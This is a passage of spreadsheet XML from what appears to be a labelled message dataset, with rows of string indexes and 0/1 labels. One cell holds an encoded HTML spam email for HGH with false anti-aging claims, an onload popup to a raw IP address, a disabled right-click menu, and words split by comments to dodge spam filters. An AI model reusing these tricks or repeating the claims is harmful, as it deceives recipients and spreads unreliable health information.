        <v>7920.0</v>
      </c>
      <c r="B7922" s="1" t="s">
        <v>1799</v>
      </c>
      <c r="C7922" s="1" t="s">
        <v>9571</v>
      </c>
      <c r="D7922" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7923" hidden="1">
      <c r="A7923" s="1">
        <v>7921.0</v>
      </c>
      <c r="B7923" s="1" t="s">
        <v>2794</v>
      </c>
      <c r="C7923" s="1" t="s">
        <v>9572</v>
      </c>
      <c r="D7923" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7924" hidden="1">
      <c r="A7924" s="1">
        <v>7922.0</v>
      </c>
      <c r="B7924" s="1" t="s">
        <v>9232</v>
      </c>
      <c r="C7924" s="1" t="s">
        <v>9233</v>
      </c>
      <c r="D7924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7925">
      <c r="A7925" s="1">
        <v>7923.0</v>
      </c>
      <c r="B7925" s="1" t="s">
        <v>1657</v>
      </c>
      <c r="C7925" s="1" t="s">
        <v>1658</v>
      </c>
      <c r="D7925" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7926" hidden="1">
      <c r="A7926" s="1">
        <v>7924.0</v>
      </c>
      <c r="B7926" s="1" t="s">
        <v>9573</v>
      </c>
      <c r="C7926" s="1" t="s">
        <v>9574</v>
      </c>
      <c r="D7926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7927" hidden="1">
      <c r="A7927" s="1">
        <v>7925.0</v>
      </c>
      <c r="B7927" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="C7927" s="1" t="s">
        <v>1200</v>
      </c>
      <c r="D7927" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7928" hidden="1">
      <c r="A7928" s="1">
        <v>7926.0</v>
      </c>
      <c r="B7928" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C7928" s="1" t="s">
        <v>9575</v>
      </c>
      <c r="D7928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7929" hidden="1">
      <c r="A7929" s="1">
        <v>7927.0</v>
      </c>
      <c r="B7929" s="1" t="s">
        <v>5944</v>
      </c>
      <c r="C7929" s="1" t="s">
        <v>5945</v>
      </c>
      <c r="D7929" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7930" hidden="1">
      <c r="A7930" s="1">
        <v>7928.0</v>
      </c>
      <c r="B7930" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C7930" s="1" t="s">
        <v>5337</v>
      </c>
      <c r="D7930" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7931" hidden="1">
      <c r="A7931" s="1">
        <v>7929.0</v>
      </c>
      <c r="B7931" s="1" t="s">
        <v>503</v>
      </c>
      <c r="C7931" s="1" t="s">
        <v>3732</v>
      </c>
      <c r="D7931" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7932" hidden="1">
      <c r="A7932" s="1">
        <v>7930.0</v>
      </c>
      <c r="B7932" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C7932" s="1" t="s">
        <v>9576</v>
      </c>
      <c r="D7932" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7933">
      <c r="A7933" s="1">
        <v>7931.0</v>
      </c>
      <c r="B7933" s="1" t="s">
        <v>9577</v>
      </c>
      <c r="C7933" s="1" t="s">
        <v>9578</v>
      </c>
      <c r="D7933" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7934" hidden="1">
      <c r="A7934" s="1">
        <v>7932.0</v>
      </c>
      <c r="B7934" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C7934" s="1" t="s">
        <v>9579</v>
      </c>
      <c r="D7934" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7935">
      <c r="A7935" s="1">
        <v>7933.0</v>
      </c>
      <c r="B7935" s="1" t="s">
        <v>9580</v>
      </c>
      <c r="C7935" s="3" t="str">
        <f>3Chtml=3E=3Cbody onload=3D=22window=2Eopen=28'http=3A=2F=2F202=2E101=
 =2E163=2E34=3A81=2Fultimatehgh=5Frun=2F'=29=22 
 bgColor=3D=22#CCCCCC=22 topmargin=3D1 onMouseOver=3D=22window=2Estatus=
 =3D''=3B return true=22 
 oncontextmenu=3D=22return false=22 ondragstart=3D=22return false=22=
  onselectstart=3D=22return false=22=3E
 =3Cdiv align=3D=22center=22=3EHello=2C =5B!To!=5D=3CBR=3E=3CBR=3E=3C=2Fdiv=
 =3E=3Cdiv align=3D=22center=22=3E=3C=2Fdiv=3E=3Cp 
 align=3D=22center=22=3E=3Cb=3E=3Cfont face=3D=22Arial=22 size=3D=224=22=
 =3EHuman Growth Hormone Therapy=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fp=3E
 =3Cp align=3D=22center=22=3E=3Cb=3E=3Cfont face=3D=22Arial=22 size=3D=224=
 =22=3ELose weight while building lean muscle 
 mass=3Cbr=3Eand reversing the ravages of aging all at once=2E=3C=2Ffont=3E=
 =3Cfont face=3D=22Arial=22 
 size=3D=223=22=3E=3Cbr=3E
 =3C=2Ffont=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 size=3D=223=22=3E =3Cbr=
 =3ERemarkable discoveries about Human Growth 
 Hormones =28=3Cb=3EHGH=3C=2Fb=3E=29 =3Cbr=3Eare changing the way we think=
  about aging and weight 
 loss=2E=3C=2Ffont=3E=3C=2Fp=3E
 =3Ccenter=3E=3Ctable width=3D=22481=22=3E=3Ctr=3E=3Ctd height=3D=222=22=
  width=3D=22247=22=3E=3Cp align=3D=22left=22=3E=3Cb=3E=3Cfont 
 face=3D=22Arial=2C Helvetica=2C sans-serif=22 size=3D=223=22=3ELose Weight=
 =3Cbr=3EBuild Muscle Tone=3Cbr=3EReverse 
 Aging=3Cbr=3E
 Increased Libido=3Cbr=3EDuration Of Penile Erection=3Cbr=3E=3C=2Ffont=3E=
 =3C=2Fb=3E=3C=2Fp=3E=3C=2Ftd=3E=3Ctd height=3D=222=22 
 width=3D=22222=22=3E=3Cp align=3D=22left=22=3E=3Cb=3E=3Cfont face=3D=
 =22Arial=2C Helvetica=2C sans-serif=22 
 size=3D=223=22=3EHealthier Bones=3Cbr=3E
 Improved Memory=3Cbr=3EImproved skin=3Cbr=3ENew Hair Growth=3Cbr=3EWrinkle=
  Disappearance 
 =3C=2Ffont=3E=3C=2Fb=3E=3C=2Fp=3E=3C=2Ftd=3E=3C=2Ftable=3E=3C=2Fcenter=3E
 =3Cp align=3D=22center=22=3E=3Ca href=3D=22http=3A=2F=2F202=2E101=2E163=
 =2E34=3A81=2Fultimatehgh=5Frun=2F=22=3E=3Cfont face=3D=22Arial=22 
 size=3D=224=22=3E=3Cb=3EVisit 
   Our Web Site and Learn The Facts =3A Click Here=3C=2Fb=3E=3C=2Ffont=3E=
 =3C=2Fa=3E=3Cbr=3E
   =3Cbr=3E
   =3Ca href=3D=22http=3A=2F=2F64=2E123=2E160=2E91=3A81=2Fultimatehgh=5Frun=
 =2F=22=3E=3Cfont size=3D=224=22=3E=3Cb=3EOR 
   Here=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fa=3E=3C=2Fp=3E
 =3Cdiv align=3D=22center=22=3E=3Cbr=3E
   You are receiving this email as a subscr=3C!----=3Eiber=3Cbr=3E
   to the Opt=3C!----=3E-In Ameri=3C!----=3Eca Mailin=3C!----=3Eg Lis=
 =3C!----=3Et=2E =3Cbr=3E
 To remo=3C!----=3Eve your=3C!----=3Eself from all related mailli=3C!--me--=
 =3Ests=2C=3Cbr=3Ejust =3Ca 
 href=3D=22http=3A=2F=2F64=2E123=2E160=2E91=3A81=2Fultimatehgh=5Frun=
 =2Fremove=2Ephp=3Fuserid=3D=5B!To!=5D=22=3EClick 
 Here=3C=2Fa=3E=3C=2Fdiv=3E=3C=2Fbody=3E=3C=2Fhtml=3E
 http://xent.com/mailman/listinfo/fork
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D7935" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7936" hidden="1">
      <c r="A7936" s="1">
        <v>7934.0</v>
      </c>
      <c r="B7936" s="1" t="s">
        <v>5108</v>
      </c>
      <c r="C7936" s="1" t="s">
        <v>5109</v>
      </c>
      <c r="D7936" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7937" hidden="1">
      <c r="A7937" s="1">
        <v>7935.0</v>
      </c>
      <c r="B7937" s="1" t="s">
        <v>8494</v>
      </c>
      <c r="C7937" s="1" t="s">
        <v>8495</v>
      </c>
      <c r="D7937" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7938" hidden="1">
      <c r="A7938" s="1">
        <v>7936.0</v>
      </c>
      <c r="B7938" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C7938" s="1" t="s">
        <v>6711</v>
      </c>
      <c r="D7938" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7939" hidden="1">
      <c r="A7939" s="1">
        <v>7937.0</v>
      </c>
      <c r="B7939" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C7939" s="1" t="s">
        <v>233</v>
      </c>
      <c r="D7939" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7940">
      <c r="A7940" s="1">
        <v>7938.0</v>
      </c>
      <c r="B7940" s="1" t="s">
        <v>9581</v>
      </c>
      <c r="C7940" s="1" t="s">
        <v>9582</v>
      </c>
      <c r="D7940" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7941" hidden="1">
      <c r="A7941" s="1">
        <v>7939.0</v>
      </c>
      <c r="B7941" s="1" t="s">
        <v>6627</v>
      </c>
      <c r="C7941" s="1" t="s">
        <v>6628</v>
      </c>
      <c r="D7941" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7942">
      <c r="A7942" s="1">
        <v>7940.0</v>
      </c>
      <c r="B7942" s="1" t="s">
        <v>6460</v>
      </c>
      <c r="C7942" s="1" t="s">
        <v>6461</v>
      </c>
      <c r="D7942" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7943" hidden="1">
      <c r="A7943" s="1">
        <v>7941.0</v>
      </c>
      <c r="B7943" s="1" t="s">
        <v>1545</v>
      </c>
      <c r="C7943" s="1" t="s">
        <v>1546</v>
      </c>
      <c r="D7943" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7944">
      <c r="A7944" s="1">
        <v>7942.0</v>
      </c>
      <c r="B7944" s="1" t="s">
        <v>9583</v>
      </c>
      <c r="C7944" s="1" t="s">
        <v>9584</v>
      </c>
      <c r="D7944" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7945" hidden="1">
      <c r="A7945" s="1">
        <v>7943.0</v>
      </c>
      <c r="B7945" s="1" t="s">
        <v>7103</v>
      </c>
      <c r="C7945" s="1" t="s">
        <v>7104</v>
      </c>
      <c r="D7945" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7946" hidden="1">
      <c r="A7946" s="1">
        <v>7944.0</v>
      </c>
      <c r="B7946" s="1" t="s">
        <v>9585</v>
      </c>
      <c r="C7946" s="1" t="s">
        <v>9586</v>
      </c>
      <c r="D7946" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7947" hidden="1">
      <c r="A7947" s="1">
        <v>7945.0</v>
      </c>
      <c r="B7947" s="1" t="s">
        <v>1102</v>
      </c>
      <c r="C7947" s="1" t="s">
        <v>3143</v>
      </c>
      <c r="D7947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7948" hidden="1">
      <c r="A7948" s="1">
        <v>7946.0</v>
      </c>
      <c r="B7948" s="1" t="s">
        <v>9587</v>
      </c>
      <c r="C7948" s="1" t="s">
        <v>9588</v>
      </c>
      <c r="D7948" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7949">
      <c r="A7949" s="1">
        <v>7947.0</v>
      </c>
      <c r="B7949" s="1" t="s">
        <v>9589</v>
      </c>
      <c r="C7949" s="1" t="s">
        <v>9590</v>
      </c>
      <c r="D7949" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7950" hidden="1">
      <c r="A7950" s="1">
        <v>7948.0</v>
      </c>
      <c r="B7950" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="C7950" s="1" t="s">
        <v>9355</v>
      </c>
      <c r="D7950" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7951" hidden="1">
      <c r="A7951" s="1">
        <v>7949.0</v>
      </c>
      <c r="B7951" s="1" t="s">
        <v>9591</v>
      </c>
      <c r="C7951" s="1" t="s">
        <v>9592</v>
      </c>
      <c r="D7951" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7952">
      <c r="A7952" s="1">
        <v>7950.0</v>
      </c>
      <c r="B7952" s="1" t="s">
        <v>9593</v>
      </c>
      <c r="C7952" s="1" t="s">
        <v>9594</v>
      </c>
      <c r="D7952" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7953" hidden="1">
      <c r="A7953" s="1">
        <v>7951.0</v>
      </c>
      <c r="B7953" s="1" t="s">
        <v>2465</v>
      </c>
      <c r="C7953" s="1" t="s">
        <v>6732</v>
      </c>
      <c r="D7953" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7954" hidden="1">
      <c r="A7954" s="1">
        <v>7952.0</v>
      </c>
      <c r="B7954" s="1" t="s">
        <v>9585</v>
      </c>
      <c r="C7954" s="1" t="s">
        <v>9595</v>
      </c>
      <c r="D7954" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7955" hidden="1">
      <c r="A7955" s="1">
        <v>7953.0</v>
      </c>
      <c r="B7955" s="1" t="s">
        <v>5422</v>
      </c>
      <c r="C7955" s="1" t="s">
        <v>5423</v>
      </c>
      <c r="D7955" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7956" hidden="1">
      <c r="A7956" s="1">
        <v>7954.0</v>
      </c>
      <c r="B7956" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C7956" s="1" t="s">
        <v>4568</v>
      </c>
      <c r="D7956" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7957">
      <c r="A7957" s="1">
        <v>7955.0</v>
      </c>
      <c r="B7957" s="1" t="s">
        <v>3307</v>
      </c>
      <c r="C7957" s="1" t="s">
        <v>3308</v>
      </c>
      <c r="D7957" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7958">
      <c r="A7958" s="1">
        <v>7956.0</v>
      </c>
      <c r="B7958" s="1" t="s">
        <v>9596</v>
      </c>
      <c r="C7958" s="1" t="s">
        <v>9597</v>
      </c>
      <c r="D7958" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7959" hidden="1">
      <c r="A7959" s="1">
        <v>7957.0</v>
      </c>
      <c r="B7959" s="1" t="s">
        <v>4824</v>
      </c>
      <c r="C7959" s="1" t="s">
        <v>4825</v>
      </c>
      <c r="D7959" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7960" hidden="1">
      <c r="A7960" s="1">
        <v>7958.0</v>
      </c>
      <c r="B7960" s="1" t="s">
        <v>2506</v>
      </c>
      <c r="C7960" s="1" t="s">
        <v>2507</v>
      </c>
      <c r="D7960" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7961" hidden="1">
      <c r="A7961" s="1">
        <v>7959.0</v>
      </c>
      <c r="B7961" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="C7961" s="1" t="s">
        <v>7699</v>
      </c>
      <c r="D7961" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7962" hidden="1">
      <c r="A7962" s="1">
        <v>7960.0</v>
      </c>
      <c r="B7962" s="1" t="s">
        <v>8759</v>
      </c>
      <c r="C7962" s="1" t="s">
        <v>8760</v>
      </c>
      <c r="D7962" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7963" hidden="1">
      <c r="A7963" s="1">
        <v>7961.0</v>
      </c>
      <c r="B7963" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C7963" s="1" t="s">
        <v>9598</v>
      </c>
      <c r="D7963" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7964">
      <c r="A7964" s="1">
        <v>7962.0</v>
      </c>
      <c r="B7964" s="1" t="s">
        <v>2786</v>
      </c>
      <c r="C7964" s="1" t="s">
        <v>2787</v>
      </c>
      <c r="D7964" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7965" hidden="1">
      <c r="A7965" s="1">
        <v>7963.0</v>
      </c>
      <c r="B7965" s="1" t="s">
        <v>4170</v>
      </c>
      <c r="C7965" s="1" t="s">
        <v>4171</v>
      </c>
      <c r="D7965" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7966" hidden="1">
      <c r="A7966" s="1">
        <v>7964.0</v>
      </c>
      <c r="B7966" s="1" t="s">
        <v>6405</v>
      </c>
      <c r="C7966" s="1" t="s">
        <v>9599</v>
      </c>
      <c r="D7966" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7967" hidden="1">
      <c r="A7967" s="1">
        <v>7965.0</v>
      </c>
      <c r="B7967" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C7967" s="1" t="s">
        <v>9600</v>
      </c>
      <c r="D7967" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7968" hidden="1">
      <c r="A7968" s="1">
        <v>7966.0</v>
      </c>
      <c r="B7968" s="1" t="s">
        <v>432</v>
      </c>
      <c r="C7968" s="1" t="s">
        <v>433</v>
      </c>
      <c r="D7968" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7969" hidden="1">
      <c r="A7969" s="1">
        <v>7967.0</v>
      </c>
      <c r="B7969" s="1" t="s">
        <v>6187</v>
      </c>
      <c r="C7969" s="1" t="s">
        <v>9601</v>
      </c>
      <c r="D7969" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7970" hidden="1">
      <c r="A7970" s="1">
        <v>7968.0</v>
      </c>
      <c r="B7970" s="1" t="s">
        <v>8839</v>
      </c>
      <c r="C7970" s="1" t="s">
        <v>8840</v>
      </c>
      <c r="D7970" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7971" hidden="1">
      <c r="A7971" s="1">
        <v>7969.0</v>
      </c>
      <c r="B7971" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C7971" s="1" t="s">
        <v>4080</v>
      </c>
      <c r="D7971" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7972" hidden="1">
      <c r="A7972" s="1">
        <v>7970.0</v>
      </c>
      <c r="B7972" s="1" t="s">
        <v>6687</v>
      </c>
      <c r="C7972" s="1" t="s">
        <v>6688</v>
      </c>
      <c r="D7972" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7973">
      <c r="A7973" s="1">
        <v>7971.0</v>
      </c>
      <c r="B7973" s="1" t="s">
        <v>2504</v>
      </c>
      <c r="C7973" s="1" t="s">
        <v>5338</v>
      </c>
      <c r="D7973" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7974" hidden="1">
      <c r="A7974" s="1">
        <v>7972.0</v>
      </c>
      <c r="B7974" s="1" t="s">
        <v>9602</v>
      </c>
      <c r="C7974" s="1" t="s">
        <v>9603</v>
      </c>
      <c r="D7974" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7975">
      <c r="A7975" s="1">
        <v>7973.0</v>
      </c>
      <c r="B7975" s="1" t="s">
        <v>9224</v>
      </c>
      <c r="C7975" s="1" t="s">
        <v>9225</v>
      </c>
      <c r="D7975" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7976">
      <c r="A7976" s="1">
        <v>7974.0</v>
      </c>
      <c r="B7976" s="1" t="s">
        <v>9604</v>
      </c>
      <c r="C7976" s="1" t="s">
        <v>9605</v>
      </c>
      <c r="D7976" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7977" hidden="1">
      <c r="A7977" s="1">
        <v>7975.0</v>
      </c>
      <c r="B7977" s="1" t="s">
        <v>9606</v>
      </c>
      <c r="C7977" s="1" t="s">
        <v>9607</v>
      </c>
      <c r="D7977" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7978" hidden="1">
      <c r="A7978" s="1">
        <v>7976.0</v>
      </c>
      <c r="B7978" s="1" t="s">
        <v>9608</v>
      </c>
      <c r="C7978" s="1" t="s">
        <v>9609</v>
      </c>
      <c r="D7978" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7979" hidden="1">
      <c r="A7979" s="1">
        <v>7977.0</v>
      </c>
      <c r="B7979" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C7979" s="1" t="s">
        <v>9610</v>
      </c>
      <c r="D7979" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7980" hidden="1">
      <c r="A7980" s="1">
        <v>7978.0</v>
      </c>
      <c r="B7980" s="1" t="s">
        <v>8957</v>
      </c>
      <c r="C7980" s="1" t="s">
        <v>8958</v>
      </c>
      <c r="D7980" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7981">
      <c r="A7981" s="1">
        <v>7979.0</v>
      </c>
      <c r="B7981" s="1" t="s">
        <v>9611</v>
      </c>
      <c r="C7981" s="1" t="s">
        <v>9612</v>
      </c>
      <c r="D7981" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7982" hidden="1">
      <c r="A7982" s="1">
        <v>7980.0</v>
      </c>
      <c r="B7982" s="1" t="s">
        <v>9613</v>
      </c>
      <c r="C7982" s="1" t="s">
        <v>9614</v>
      </c>
      <c r="D7982" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7983" hidden="1">
      <c r="A7983" s="1">
        <v>7981.0</v>
      </c>
      <c r="B7983" s="1" t="s">
        <v>9419</v>
      </c>
      <c r="C7983" s="1" t="s">
        <v>9420</v>
      </c>
      <c r="D7983" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7984" hidden="1">
      <c r="A7984" s="1">
        <v>7982.0</v>
      </c>
      <c r="B7984" s="1" t="s">
        <v>3764</v>
      </c>
      <c r="C7984" s="1" t="s">
        <v>3765</v>
      </c>
      <c r="D7984" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7985" hidden="1">
      <c r="A7985" s="1">
        <v>7983.0</v>
      </c>
      <c r="B7985" s="1" t="s">
        <v>9602</v>
      </c>
      <c r="C7985" s="1" t="s">
        <v>9603</v>
      </c>
      <c r="D7985" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7986" hidden="1">
      <c r="A7986" s="1">
        <v>7984.0</v>
      </c>
      <c r="B7986" s="1" t="s">
        <v>9615</v>
      </c>
      <c r="C7986" s="1" t="s">
        <v>9616</v>
      </c>
      <c r="D7986" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7987" hidden="1">
      <c r="A7987" s="1">
        <v>7985.0</v>
      </c>
      <c r="B7987" s="1" t="s">
        <v>6560</v>
      </c>
      <c r="C7987" s="1" t="s">
        <v>9617</v>
      </c>
      <c r="D7987" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7988" hidden="1">
      <c r="A7988" s="1">
        <v>7986.0</v>
      </c>
      <c r="B7988" s="1" t="s">
        <v>5240</v>
      </c>
      <c r="C7988" s="1" t="s">
        <v>9618</v>
      </c>
      <c r="D7988" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7989" hidden="1">
      <c r="A7989" s="1">
        <v>7987.0</v>
      </c>
      <c r="B7989" s="1" t="s">
        <v>9619</v>
      </c>
      <c r="C7989" s="1" t="s">
        <v>9620</v>
      </c>
      <c r="D7989" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7990" hidden="1">
      <c r="A7990" s="1">
        <v>7988.0</v>
      </c>
      <c r="B7990" s="1" t="s">
        <v>2760</v>
      </c>
      <c r="C7990" s="1" t="s">
        <v>8690</v>
      </c>
      <c r="D7990" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7991" hidden="1">
      <c r="A7991" s="1">
        <v>7989.0</v>
      </c>
      <c r="B7991" s="1" t="s">
        <v>6183</v>
      </c>
      <c r="C7991" s="1" t="s">
        <v>6184</v>
      </c>
      <c r="D7991" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7992" hidden="1">
      <c r="A7992" s="1">
        <v>7990.0</v>
      </c>
      <c r="B7992" s="1" t="s">
        <v>9103</v>
      </c>
      <c r="C7992" s="1" t="s">
        <v>9104</v>
      </c>
      <c r="D7992" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7993" hidden="1">
      <c r="A7993" s="1">
        <v>7991.0</v>
      </c>
      <c r="B7993" s="1" t="s">
        <v>2380</v>
      </c>
      <c r="C7993" s="1" t="s">
        <v>2381</v>
      </c>
      <c r="D7993" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7994" hidden="1">
      <c r="A7994" s="1">
        <v>7992.0</v>
      </c>
      <c r="B7994" s="1" t="s">
        <v>9621</v>
      </c>
      <c r="C7994" s="1" t="s">
        <v>9622</v>
      </c>
      <c r="D7994" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7995" hidden="1">
      <c r="A7995" s="1">
        <v>7993.0</v>
      </c>
      <c r="B7995" s="1" t="s">
        <v>8548</v>
      </c>
      <c r="C7995" s="1" t="s">
        <v>9623</v>
      </c>
      <c r="D7995" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7996" hidden="1">
      <c r="A7996" s="1">
        <v>7994.0</v>
      </c>
      <c r="B7996" s="1" t="s">
        <v>6361</v>
      </c>
      <c r="C7996" s="1" t="s">
        <v>6362</v>
      </c>
      <c r="D7996" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7997" hidden="1">
      <c r="A7997" s="1">
        <v>7995.0</v>
      </c>
      <c r="B7997" s="1" t="s">
        <v>711</v>
      </c>
      <c r="C7997" s="1" t="s">
        <v>4978</v>
      </c>
      <c r="D7997" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7998" hidden="1">
      <c r="A7998" s="1">
        <v>7996.0</v>
      </c>
      <c r="B7998" s="1" t="s">
        <v>4980</v>
      </c>
      <c r="C7998" s="1" t="s">
        <v>4981</v>
      </c>
      <c r="D7998" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7999" hidden="1">
      <c r="A7999" s="1">
        <v>7997.0</v>
      </c>
      <c r="B7999" s="1" t="s">
        <v>1245</v>
      </c>
      <c r="C7999" s="1" t="s">
        <v>1246</v>
      </c>
      <c r="D7999" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8000" hidden="1">
      <c r="A8000" s="1">
        <v>7998.0</v>
      </c>
      <c r="B8000" s="1" t="s">
        <v>493</v>
      </c>
      <c r="C8000" s="1" t="s">
        <v>9624</v>
      </c>
      <c r="D8000" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8001">
      <c r="A8001" s="1">
        <v>7999.0</v>
      </c>
      <c r="B8001" s="1" t="s">
        <v>1967</v>
      </c>
      <c r="C8001" s="1" t="s">
        <v>7433</v>
      </c>
      <c r="D8001" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8002" hidden="1">
      <c r="A8002" s="1">
        <v>8000.0</v>
      </c>
      <c r="B8002" s="1" t="s">
        <v>6667</v>
      </c>
      <c r="C8002" s="1" t="s">
        <v>9625</v>
      </c>
      <c r="D8002" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8003">
      <c r="A8003" s="1">
        <v>8001.0</v>
      </c>
      <c r="B8003" s="1" t="s">
        <v>202</v>
      </c>
      <c r="C8003" s="1" t="s">
        <v>203</v>
      </c>
      <c r="D8003" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8004" hidden="1">
      <c r="A8004" s="1">
        <v>8002.0</v>
      </c>
      <c r="B8004" s="1" t="s">
        <v>9626</v>
      </c>
      <c r="C8004" s="1" t="s">
        <v>9627</v>
      </c>
      <c r="D8004" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8005" hidden="1">
      <c r="A8005" s="1">
        <v>8003.0</v>
      </c>
      <c r="B8005" s="1" t="s">
        <v>2737</v>
      </c>
      <c r="C8005" s="1" t="s">
        <v>9628</v>
      </c>
      <c r="D8005" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8006">
      <c r="A8006" s="1">
        <v>8004.0</v>
      </c>
      <c r="B8006" s="1" t="s">
        <v>7282</v>
      </c>
      <c r="C8006" s="1" t="s">
        <v>7283</v>
      </c>
      <c r="D8006" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8007" hidden="1">
      <c r="A8007" s="1">
        <v>8005.0</v>
      </c>
      <c r="B8007" s="1" t="s">
        <v>2852</v>
      </c>
      <c r="C8007" s="1" t="s">
        <v>9629</v>
      </c>
      <c r="D8007" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8008" hidden="1">
      <c r="A8008" s="1">
        <v>8006.0</v>
      </c>
      <c r="B8008" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C8008" s="1" t="s">
        <v>295</v>
      </c>
      <c r="D8008" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8009" hidden="1">
      <c r="A8009" s="1">
        <v>8007.0</v>
      </c>
      <c r="B8009" s="1" t="s">
        <v>784</v>
      </c>
      <c r="C8009" s="1" t="s">
        <v>4957</v>
      </c>
      <c r="D8009" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8010" hidden="1">
      <c r="A8010" s="1">
        <v>8008.0</v>
      </c>
      <c r="B8010" s="1" t="s">
        <v>2193</v>
      </c>
      <c r="C8010" s="1" t="s">
        <v>9630</v>
      </c>
      <c r="D8010" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8011" hidden="1">
      <c r="A8011" s="1">
        <v>8009.0</v>
      </c>
      <c r="B8011" s="1" t="s">
